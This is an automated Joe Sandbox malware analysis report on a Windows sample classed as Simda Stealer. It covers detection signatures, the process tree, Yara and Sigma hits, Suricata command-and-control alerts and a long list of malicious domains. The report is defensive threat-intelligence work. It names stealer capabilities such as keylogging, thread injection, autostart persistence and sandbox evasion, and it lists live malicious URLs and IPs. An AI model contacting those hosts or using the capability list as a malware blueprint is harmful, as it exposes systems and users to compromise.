Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Z8eHwAvqAh.exe

Overview

General Information

Sample name:Z8eHwAvqAh.exe
renamed because original name is a hash value
Original sample name:281bff88b708e81638f6c4548d0bac897a059c54.exe
Analysis ID:1553825
MD5:3ab620205abe34e0bb0a34c253b30cd7
SHA1:281bff88b708e81638f6c4548d0bac897a059c54
SHA256:8b72b2f58a4fe3d7be31e9bc4b53c8b21bc3410243325d2ac15627419fd051ff
Tags:exeuser-NDA0E
Infos:

Detection

Simda Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Detected unpacking (creates a PE file in dynamic memory)
Detected unpacking (overwrites its own PE header)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Simda Stealer
AI detected suspicious sample
Allocates memory in foreign processes
Checks if browser processes are running
Contains VNC / remote desktop functionality (version string found)
Contains functionality to behave differently if execute on a Russian/Kazak computer
Contains functionality to capture and log keystrokes
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to detect sandboxes (registry SystemBiosVersion/Date)
Contains functionality to infect the boot sector
Contains functionality to inject threads in other processes
Creates a thread in another existing process (thread injection)
Creates an undocumented autostart registry key
Drops PE files with benign system names
Drops executables to the windows directory (C:\Windows) and starts them
Found direct / indirect Syscall (likely to bypass EDR)
Found evasive API chain (may stop execution after checking volume information)
Found evasive API chain checking for user administrative privileges
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Monitors registry run keys for changes
Moves itself to temp directory
Queries Google from non browser process on port 80
Queries random domain names (often used to prevent blacklisting and sinkholes)
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: System File Execution Location Anomaly
Tries to resolve many domain names, but no domain seems valid
Uses known network protocols on non-standard ports
Writes to foreign memory regions
Checks if the current process is being debugged
Connects to many different domains
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a connection to the internet is available
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to communicate with device drivers
Contains functionality to create system tasks
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to launch a process as a different user
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality to retrieve information about pressed keystrokes
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables security privileges
Executes massive DNS lookups (> 100)
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (might use process or thread times for sandbox detection)
Found large amount of non-executed APIs
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May initialize a security null descriptor
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Sigma detected: CurrentVersion NT Autorun Keys Modification
Sigma detected: Uncommon Svchost Parent Process
Suricata IDS alerts with low severity for network traffic
Tries to disable installed Antivirus / HIPS / PFW
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Z8eHwAvqAh.exe (PID: 7836 cmdline: "C:\Users\user\Desktop\Z8eHwAvqAh.exe" MD5: 3AB620205ABE34E0BB0A34C253B30CD7)
    • svchost.exe (PID: 7908 cmdline: "C:\Windows\apppatch\svchost.exe" MD5: 3544C1362497D11F8724B63036038086)
      • swvGCAxOMikYQeoQzimiprVu.exe (PID: 7544 cmdline: "C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • WerFault.exe (PID: 5088 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7544 -s 744 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • swvGCAxOMikYQeoQzimiprVu.exe (PID: 7520 cmdline: "C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • WerFault.exe (PID: 5076 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7520 -s 732 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • swvGCAxOMikYQeoQzimiprVu.exe (PID: 7496 cmdline: "C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • WerFault.exe (PID: 6700 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7496 -s 740 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • swvGCAxOMikYQeoQzimiprVu.exe (PID: 7472 cmdline: "C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • WerFault.exe (PID: 6428 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7472 -s 740 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • swvGCAxOMikYQeoQzimiprVu.exe (PID: 7448 cmdline: "C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • swvGCAxOMikYQeoQzimiprVu.exe (PID: 7428 cmdline: "C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • swvGCAxOMikYQeoQzimiprVu.exe (PID: 7400 cmdline: "C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • swvGCAxOMikYQeoQzimiprVu.exe (PID: 7380 cmdline: "C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • swvGCAxOMikYQeoQzimiprVu.exe (PID: 7352 cmdline: "C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • swvGCAxOMikYQeoQzimiprVu.exe (PID: 7328 cmdline: "C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • swvGCAxOMikYQeoQzimiprVu.exe (PID: 7304 cmdline: "C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • swvGCAxOMikYQeoQzimiprVu.exe (PID: 7268 cmdline: "C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • swvGCAxOMikYQeoQzimiprVu.exe (PID: 7232 cmdline: "C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000003.2085406801.0000000003EB0000.00000004.00001000.00020000.00000000.sdmpWindows_Trojan_Zeus_e51c60d7Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.unknown
  • 0x49260:$a1: name=%s&port=%u
  • 0x489f8:$a2: data_inject
  • 0x48be4:$a3: keylog.txt
  • 0x4888d:$a4: User-agent: %s]]]
  • 0x493b4:$a5: %s\%02d.bmp
00000002.00000003.2140868615.0000000003EB0000.00000004.00001000.00020000.00000000.sdmpWindows_Trojan_Zeus_e51c60d7Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.unknown
  • 0x49260:$a1: name=%s&port=%u
  • 0x489f8:$a2: data_inject
  • 0x48be4:$a3: keylog.txt
  • 0x4888d:$a4: User-agent: %s]]]
  • 0x493b4:$a5: %s\%02d.bmp
00000002.00000003.2143770562.0000000002700000.00000004.00001000.00020000.00000000.sdmpWindows_Trojan_Zeus_e51c60d7Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.unknown
  • 0x49260:$a1: name=%s&port=%u
  • 0x489f8:$a2: data_inject
  • 0x48be4:$a3: keylog.txt
  • 0x4888d:$a4: User-agent: %s]]]
  • 0x493b4:$a5: %s\%02d.bmp
00000002.00000003.2147781586.0000000002700000.00000004.00001000.00020000.00000000.sdmpWindows_Trojan_Zeus_e51c60d7Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.unknown
  • 0x49260:$a1: name=%s&port=%u
  • 0x489f8:$a2: data_inject
  • 0x48be4:$a3: keylog.txt
  • 0x4888d:$a4: User-agent: %s]]]
  • 0x493b4:$a5: %s\%02d.bmp
00000002.00000003.2140232259.0000000003EB0000.00000004.00001000.00020000.00000000.sdmpWindows_Trojan_Zeus_e51c60d7Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.unknown
  • 0x49260:$a1: name=%s&port=%u
  • 0x489f8:$a2: data_inject
  • 0x48be4:$a3: keylog.txt
  • 0x4888d:$a4: User-agent: %s]]]
  • 0x493b4:$a5: %s\%02d.bmp
Click to see the 68 entries

Unpacked PEs

SourceRuleDescriptionAuthorStrings
2.3.svchost.exe.2700000.28.unpackWindows_Trojan_Zeus_e51c60d7Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.unknown
  • 0x48660:$a1: name=%s&port=%u
  • 0x47df8:$a2: data_inject
  • 0x47fe4:$a3: keylog.txt
  • 0x47c8d:$a4: User-agent: %s]]]
  • 0x487b4:$a5: %s\%02d.bmp
2.3.svchost.exe.2700000.39.unpackWindows_Trojan_Zeus_e51c60d7Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.unknown
  • 0x48660:$a1: name=%s&port=%u
  • 0x47df8:$a2: data_inject
  • 0x47fe4:$a3: keylog.txt
  • 0x47c8d:$a4: User-agent: %s]]]
  • 0x487b4:$a5: %s\%02d.bmp
2.3.svchost.exe.889400.2.raw.unpackWindows_Trojan_Zeus_e51c60d7Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.unknown
  • 0x49e60:$a1: name=%s&port=%u
  • 0x495f8:$a2: data_inject
  • 0x497e4:$a3: keylog.txt
  • 0x4948d:$a4: User-agent: %s]]]
  • 0x49fb4:$a5: %s\%02d.bmp
25.2.swvGCAxOMikYQeoQzimiprVu.exe.1590000.2.raw.unpackWindows_Trojan_Zeus_e51c60d7Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.unknown
  • 0x49e60:$a1: name=%s&port=%u
  • 0x495f8:$a2: data_inject
  • 0x497e4:$a3: keylog.txt
  • 0x4948d:$a4: User-agent: %s]]]
  • 0x49fb4:$a5: %s\%02d.bmp
2.3.svchost.exe.3eb0000.16.unpackWindows_Trojan_Zeus_e51c60d7Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.unknown
  • 0x48660:$a1: name=%s&port=%u
  • 0x47df8:$a2: data_inject
  • 0x47fe4:$a3: keylog.txt
  • 0x47c8d:$a4: User-agent: %s]]]
  • 0x487b4:$a5: %s\%02d.bmp
Click to see the 125 entries

Sigma Signatures

System Summary

barindex
Sigma detected: Files With System Process Name In Unsuspected Locations
Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\Z8eHwAvqAh.exe, ProcessId: 7836, TargetFilename: C:\Windows\apppatch\svchost.exe
Sigma detected: System File Execution Location Anomaly
Source: Process startedAuthor: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: "C:\Windows\apppatch\svchost.exe", CommandLine: "C:\Windows\apppatch\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\apppatch\svchost.exe, NewProcessName: C:\Windows\apppatch\svchost.exe, OriginalFileName: C:\Windows\apppatch\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Z8eHwAvqAh.exe", ParentImage: C:\Users\user\Desktop\Z8eHwAvqAh.exe, ParentProcessId: 7836, ParentProcessName: Z8eHwAvqAh.exe, ProcessCommandLine: "C:\Windows\apppatch\svchost.exe", ProcessId: 7908, ProcessName: svchost.exe
Sigma detected: CurrentVersion NT Autorun Keys Modification
Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Windows\system32\userinit.exe,C:\Windows\apppatch\svchost.exe,, EventID: 13, EventType: SetValue, Image: C:\Windows\apppatch\svchost.exe, ProcessId: 7908, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\userinit
Sigma detected: Uncommon Svchost Parent Process
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\apppatch\svchost.exe", CommandLine: "C:\Windows\apppatch\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\apppatch\svchost.exe, NewProcessName: C:\Windows\apppatch\svchost.exe, OriginalFileName: C:\Windows\apppatch\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Z8eHwAvqAh.exe", ParentImage: C:\Users\user\Desktop\Z8eHwAvqAh.exe, ParentProcessId: 7836, ParentProcessName: Z8eHwAvqAh.exe, ProcessCommandLine: "C:\Windows\apppatch\svchost.exe", ProcessId: 7908, ProcessName: svchost.exe
Sigma detected: Windows Processes Suspicious Parent Directory
Source: Process startedAuthor: vburov: Data: Command: "C:\Windows\apppatch\svchost.exe", CommandLine: "C:\Windows\apppatch\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\apppatch\svchost.exe, NewProcessName: C:\Windows\apppatch\svchost.exe, OriginalFileName: C:\Windows\apppatch\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Z8eHwAvqAh.exe", ParentImage: C:\Users\user\Desktop\Z8eHwAvqAh.exe, ParentProcessId: 7836, ParentProcessName: Z8eHwAvqAh.exe, ProcessCommandLine: "C:\Windows\apppatch\svchost.exe", ProcessId: 7908, ProcessName: svchost.exe

Suricata Signatures

TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-11-11T18:24:40.920775+010020229301A Network Trojan was detected4.245.163.56443192.168.2.1049807TCP
2024-11-11T18:25:18.978992+010020229301A Network Trojan was detected4.245.163.56443192.168.2.1064065TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-11-11T18:24:29.661302+010020181411A Network Trojan was detected18.208.156.24880192.168.2.1049723TCP
2024-11-11T18:24:29.964042+010020181411A Network Trojan was detected3.94.10.3480192.168.2.1049725TCP
2024-11-11T18:24:30.499898+010020181411A Network Trojan was detected44.221.84.10580192.168.2.1049736TCP
2024-11-11T18:25:25.507333+010020181411A Network Trojan was detected52.34.198.22980192.168.2.1057974TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-11-11T18:24:29.661302+010020377711A Network Trojan was detected18.208.156.24880192.168.2.1049723TCP
2024-11-11T18:24:29.964042+010020377711A Network Trojan was detected3.94.10.3480192.168.2.1049725TCP
2024-11-11T18:24:30.499898+010020377711A Network Trojan was detected44.221.84.10580192.168.2.1049736TCP
2024-11-11T18:25:25.507333+010020377711A Network Trojan was detected52.34.198.22980192.168.2.1057974TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-11-11T18:24:29.542828+010020210221A Network Trojan was detected1.1.1.153192.168.2.1064434UDP
2024-11-11T18:25:54.210999+010020210221A Network Trojan was detected1.1.1.153192.168.2.1054457UDP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-11-11T18:24:29.656338+010028048521Malware Command and Control Activity Detected192.168.2.104972318.208.156.24880TCP
2024-11-11T18:24:29.924269+010028048521Malware Command and Control Activity Detected192.168.2.1049724199.59.243.22780TCP
2024-11-11T18:24:29.956188+010028048521Malware Command and Control Activity Detected192.168.2.10497253.94.10.3480TCP
2024-11-11T18:24:30.172576+010028048521Malware Command and Control Activity Detected192.168.2.104972723.253.46.6480TCP
2024-11-11T18:24:30.235862+010028048521Malware Command and Control Activity Detected192.168.2.104972899.83.170.380TCP
2024-11-11T18:24:30.252508+010028048521Malware Command and Control Activity Detected192.168.2.1049726188.114.96.380TCP
2024-11-11T18:24:30.455126+010028048521Malware Command and Control Activity Detected192.168.2.104973544.221.84.10580TCP
2024-11-11T18:24:30.468239+010028048521Malware Command and Control Activity Detected192.168.2.1049734208.100.26.24580TCP
2024-11-11T18:24:30.492705+010028048521Malware Command and Control Activity Detected192.168.2.104973644.221.84.10580TCP
2024-11-11T18:24:30.572465+010028048521Malware Command and Control Activity Detected192.168.2.1049734208.100.26.24580TCP
2024-11-11T18:24:30.884282+010028048521Malware Command and Control Activity Detected192.168.2.104973823.253.46.6480TCP
2024-11-11T18:24:31.271136+010028048521Malware Command and Control Activity Detected192.168.2.104973999.83.170.3443TCP
2024-11-11T18:24:31.354863+010028048521Malware Command and Control Activity Detected192.168.2.1049741154.212.231.8280TCP
2024-11-11T18:24:31.619135+010028048521Malware Command and Control Activity Detected192.168.2.1049737199.191.50.8380TCP
2024-11-11T18:24:31.721361+010028048521Malware Command and Control Activity Detected192.168.2.1049741154.212.231.8280TCP
2024-11-11T18:24:31.878427+010028048521Malware Command and Control Activity Detected192.168.2.1049740188.114.96.3443TCP
2024-11-11T18:24:32.263879+010028048521Malware Command and Control Activity Detected192.168.2.1049726188.114.96.380TCP
2024-11-11T18:24:33.756133+010028048521Malware Command and Control Activity Detected192.168.2.1049761188.114.96.3443TCP
2024-11-11T18:25:01.551897+010028048521Malware Command and Control Activity Detected192.168.2.1049747178.162.203.20280TCP
2024-11-11T18:25:10.006115+010028048521Malware Command and Control Activity Detected192.168.2.1049974178.162.203.20280TCP
2024-11-11T18:25:10.468485+010028048521Malware Command and Control Activity Detected192.168.2.104999413.248.169.4880TCP
2024-11-11T18:25:10.752110+010028048521Malware Command and Control Activity Detected192.168.2.106405318.208.156.24880TCP
2024-11-11T18:25:10.778434+010028048521Malware Command and Control Activity Detected192.168.2.10640543.94.10.3480TCP
2024-11-11T18:25:10.891885+010028048521Malware Command and Control Activity Detected192.168.2.1064052188.114.97.380TCP
2024-11-11T18:25:11.599597+010028048521Malware Command and Control Activity Detected192.168.2.1064055103.150.10.4880TCP
2024-11-11T18:25:12.707263+010028048521Malware Command and Control Activity Detected192.168.2.1064055103.150.10.4880TCP
2024-11-11T18:25:14.399690+010028048521Malware Command and Control Activity Detected192.168.2.1064056188.114.97.3443TCP
2024-11-11T18:25:14.823138+010028048521Malware Command and Control Activity Detected192.168.2.1064052188.114.97.380TCP
2024-11-11T18:25:16.983038+010028048521Malware Command and Control Activity Detected192.168.2.1064058188.114.97.3443TCP
2024-11-11T18:25:17.820751+010028048521Malware Command and Control Activity Detected192.168.2.106405976.223.67.18980TCP
2024-11-11T18:25:17.942769+010028048521Malware Command and Control Activity Detected192.168.2.1064060103.224.212.21080TCP
2024-11-11T18:25:18.030999+010028048521Malware Command and Control Activity Detected192.168.2.1064061103.224.182.25280TCP
2024-11-11T18:25:18.054302+010028048521Malware Command and Control Activity Detected192.168.2.106406444.221.84.10580TCP
2024-11-11T18:25:18.068366+010028048521Malware Command and Control Activity Detected192.168.2.106406264.225.91.7380TCP
2024-11-11T18:25:18.434038+010028048521Malware Command and Control Activity Detected192.168.2.1064063154.85.183.5080TCP
2024-11-11T18:25:18.728763+010028048521Malware Command and Control Activity Detected192.168.2.1064063154.85.183.5080TCP
2024-11-11T18:25:20.420375+010028048521Malware Command and Control Activity Detected192.168.2.106237364.225.91.7380TCP
2024-11-11T18:25:20.659044+010028048521Malware Command and Control Activity Detected192.168.2.106130072.52.179.17480TCP
2024-11-11T18:25:22.090869+010028048521Malware Command and Control Activity Detected192.168.2.106130172.52.179.17480TCP
2024-11-11T18:25:25.491907+010028048521Malware Command and Control Activity Detected192.168.2.105797452.34.198.22980TCP
2024-11-11T18:25:28.402460+010028048521Malware Command and Control Activity Detected192.168.2.105748144.221.84.10580TCP
2024-11-11T18:25:29.986729+010028048521Malware Command and Control Activity Detected192.168.2.1062042199.59.243.22780TCP
2024-11-11T18:25:30.016943+010028048521Malware Command and Control Activity Detected192.168.2.106204323.253.46.6480TCP
2024-11-11T18:25:30.024856+010028048521Malware Command and Control Activity Detected192.168.2.1062044208.100.26.24580TCP
2024-11-11T18:25:30.172771+010028048521Malware Command and Control Activity Detected192.168.2.106204799.83.170.380TCP
2024-11-11T18:25:30.376055+010028048521Malware Command and Control Activity Detected192.168.2.1062044208.100.26.24580TCP
2024-11-11T18:25:30.465143+010028048521Malware Command and Control Activity Detected192.168.2.1062045154.212.231.8280TCP
2024-11-11T18:25:30.544301+010028048521Malware Command and Control Activity Detected192.168.2.1062046188.114.96.380TCP
2024-11-11T18:25:30.773879+010028048521Malware Command and Control Activity Detected192.168.2.106204823.253.46.6480TCP
2024-11-11T18:25:30.840579+010028048521Malware Command and Control Activity Detected192.168.2.1062045154.212.231.8280TCP
2024-11-11T18:25:31.135013+010028048521Malware Command and Control Activity Detected192.168.2.106204999.83.170.3443TCP
2024-11-11T18:25:31.798675+010028048521Malware Command and Control Activity Detected192.168.2.1062050188.114.96.3443TCP
2024-11-11T18:25:32.206033+010028048521Malware Command and Control Activity Detected192.168.2.1062046188.114.96.380TCP
2024-11-11T18:25:33.653749+010028048521Malware Command and Control Activity Detected192.168.2.1062051188.114.96.3443TCP
2024-11-11T18:25:37.542456+010028048521Malware Command and Control Activity Detected192.168.2.1062041178.162.203.20280TCP
2024-11-11T18:25:49.893635+010028048521Malware Command and Control Activity Detected192.168.2.1062052178.162.203.20280TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus / Scanner detection for submitted sample
Source: Z8eHwAvqAh.exeAvira: detected
Antivirus detection for URL or domain
Source: http://ganyhab.com/Avira URL Cloud: Label: malware
Source: http://volyjym.com/login.phpAvira URL Cloud: Label: malware
Source: http://lyvytan.com/login.php9Avira URL Cloud: Label: malware
Source: http://pupymol.com/login.phpAvira URL Cloud: Label: malware
Source: http://vonymoc.com/Avira URL Cloud: Label: malware
Source: http://vopycoc.com/login.phpAvira URL Cloud: Label: malware
Source: http://vofybic.com/login.phpAvira URL Cloud: Label: malware
Source: http://ww16.vofycot.com/login.php?sub1=20241112-0425-1706-a2c8-02526792f211Avira URL Cloud: Label: malware
Source: http://lysyfed.com/login.phpAvira URL Cloud: Label: malware
Source: http://qekynog.com/login.phpAvira URL Cloud: Label: phishing
Source: http://puvybeg.com/HAvira URL Cloud: Label: malware
Source: http://vopydum.com/Avira URL Cloud: Label: phishing
Source: http://vocyjet.com/login.phpAvira URL Cloud: Label: malware
Source: http://lyryxen.com/login.phpAvira URL Cloud: Label: malware
Source: http://vofymif.com/login.phpAvira URL Cloud: Label: malware
Source: http://qegyvuq.com/login.phpAvira URL Cloud: Label: phishing
Source: http://vowyrif.com/login.phpAvira URL Cloud: Label: malware
Source: http://purymog.com/Avira URL Cloud: Label: malware
Source: http://vojyjyc.com/login.phpAvira URL Cloud: Label: phishing
Source: http://galyvuz.com/login.phpAvira URL Cloud: Label: malware
Source: http://qexynyq.com/login.phpAvira URL Cloud: Label: malware
Source: http://lysyvax.com/login.phpAvira URL Cloud: Label: malware
Source: http://galydyw.com/Avira URL Cloud: Label: malware
Source: http://vocygim.com/Avira URL Cloud: Label: malware
Source: http://vofyqek.com/0;Avira URL Cloud: Label: malware
Source: http://qekyhil.com/login.phpAvira URL Cloud: Label: malware
Source: http://qebyqeq.com/login.phpAvira URL Cloud: Label: malware
Source: http://gatyniz.com/Avira URL Cloud: Label: malware
Source: http://pujylyv.com/Avira URL Cloud: Label: malware
Source: http://pupyguq.com/login.phpAvira URL Cloud: Label: malware
Source: http://puvyxig.com/login.phpgAvira URL Cloud: Label: malware
Source: http://qetykyq.com/login.phpAvira URL Cloud: Label: malware
Source: http://lygysij.com/Avira URL Cloud: Label: malware
Source: http://volydyk.com/Avira URL Cloud: Label: malware
Source: http://lysytoj.com/login.phpAvira URL Cloud: Label: malware
Source: http://vojyduf.com/login.phpAvira URL Cloud: Label: malware
Source: http://pupycuv.com/login.phpAvira URL Cloud: Label: malware
Source: http://puvydyp.com/Avira URL Cloud: Label: malware
Source: http://qetyvil.com/login.phpAvira URL Cloud: Label: malware
Source: http://vofypam.com/login.phpAvira URL Cloud: Label: malware
Source: http://lygyvuj.com/login.phpAvira URL Cloud: Label: phishing
Source: https://puzylyp.com/login.phpAvira URL Cloud: Label: malware
Source: http://lysynaj.com/login.phpAvira URL Cloud: Label: malware
Source: http://vojybim.com/login.phpAvira URL Cloud: Label: phishing
Source: http://puzylyp.com/HAvira URL Cloud: Label: malware
Source: http://qekynuq.com/http://vopypif.com/Avira URL Cloud: Label: malware
Source: http://lysyxar.com/login.phpAvira URL Cloud: Label: malware
Source: http://qetylyv.com/Avira URL Cloud: Label: phishing
Source: http://galyhib.com/login.phpAvira URL Cloud: Label: malware
Source: http://lyxygax.com/login.phpAvira URL Cloud: Label: malware
Source: http://vopykum.com/login.phpAvira URL Cloud: Label: malware
Source: http://pumytup.com/login.phpAvira URL Cloud: Label: malware
Source: http://ganynos.com/Avira URL Cloud: Label: malware
Source: http://puzypav.com/Avira URL Cloud: Label: malware
Source: http://lymywaj.com/login.phpAvira URL Cloud: Label: malware
Source: http://qexyreg.com/login.phpAvira URL Cloud: Label: malware
Source: http://qetyveq.com/login.phpAvira URL Cloud: Label: malware
Source: http://galyqoh.com/login.phpAvira URL Cloud: Label: malware
Source: http://volyjok.com/HAvira URL Cloud: Label: malware
Source: http://vonypic.com/login.phpAvira URL Cloud: Label: malware
Source: http://puzyduq.com/login.phpAvira URL Cloud: Label: malware
Source: http://gahyvuh.com/login.phpAvira URL Cloud: Label: malware
Source: http://puzydal.com/login.phpAvira URL Cloud: Label: malware
Source: http://lyxysad.com/login.phpAvira URL Cloud: Label: malware
Source: http://pujyjol.com/login.phpAvira URL Cloud: Label: phishing
Source: http://vowyqik.com/login.phpcom/login.phpAvira URL Cloud: Label: malware
Source: http://vowyqyt.com/HAvira URL Cloud: Label: malware
Source: http://gahyhys.com/login.phpAvira URL Cloud: Label: malware
Source: http://purywyl.com/login.phpAvira URL Cloud: Label: malware
Source: https://qegyhig.com/wp-json/Avira URL Cloud: Label: malware
Source: http://puryxag.com/login.phpAvira URL Cloud: Label: malware
Source: http://lykyjad.com/login.phpAvira URL Cloud: Label: malware
Source: http://vopymyc.com/login.phpAvira URL Cloud: Label: malware
Source: http://vojycec.com/login.phpAvira URL Cloud: Label: malware
Source: http://gatyhos.com/Avira URL Cloud: Label: malware
Source: http://qegytyv.com/login.phpAvira URL Cloud: Label: malware
Source: http://gadyzib.com/Avira URL Cloud: Label: malware
Source: http://lyryman.com/Avira URL Cloud: Label: malware
Source: http://vojycec.com/Avira URL Cloud: Label: malware
Source: http://lyryvur.com/login.phpAvira URL Cloud: Label: malware
Source: http://qedyxel.com/login.phpAvira URL Cloud: Label: phishing
Source: http://pujygug.com/login.phpAvira URL Cloud: Label: malware
Source: http://vonydem.com/Avira URL Cloud: Label: malware
Source: http://lysyvan.com/login.phpAvira URL Cloud: Label: malware
Source: http://lyvyxyj.com/login.phpAvira URL Cloud: Label: malware
Source: http://lysysyx.com/login.phpAvira URL Cloud: Label: malware
Source: http://lygyged.com/login.phpAvira URL Cloud: Label: malware
Source: http://vopycyf.com/login.phpAvira URL Cloud: Label: phishing
Source: http://ganyvyw.com/login.phpAvira URL Cloud: Label: malware
Source: http://lysysir.com/login.phpAvira URL Cloud: Label: malware
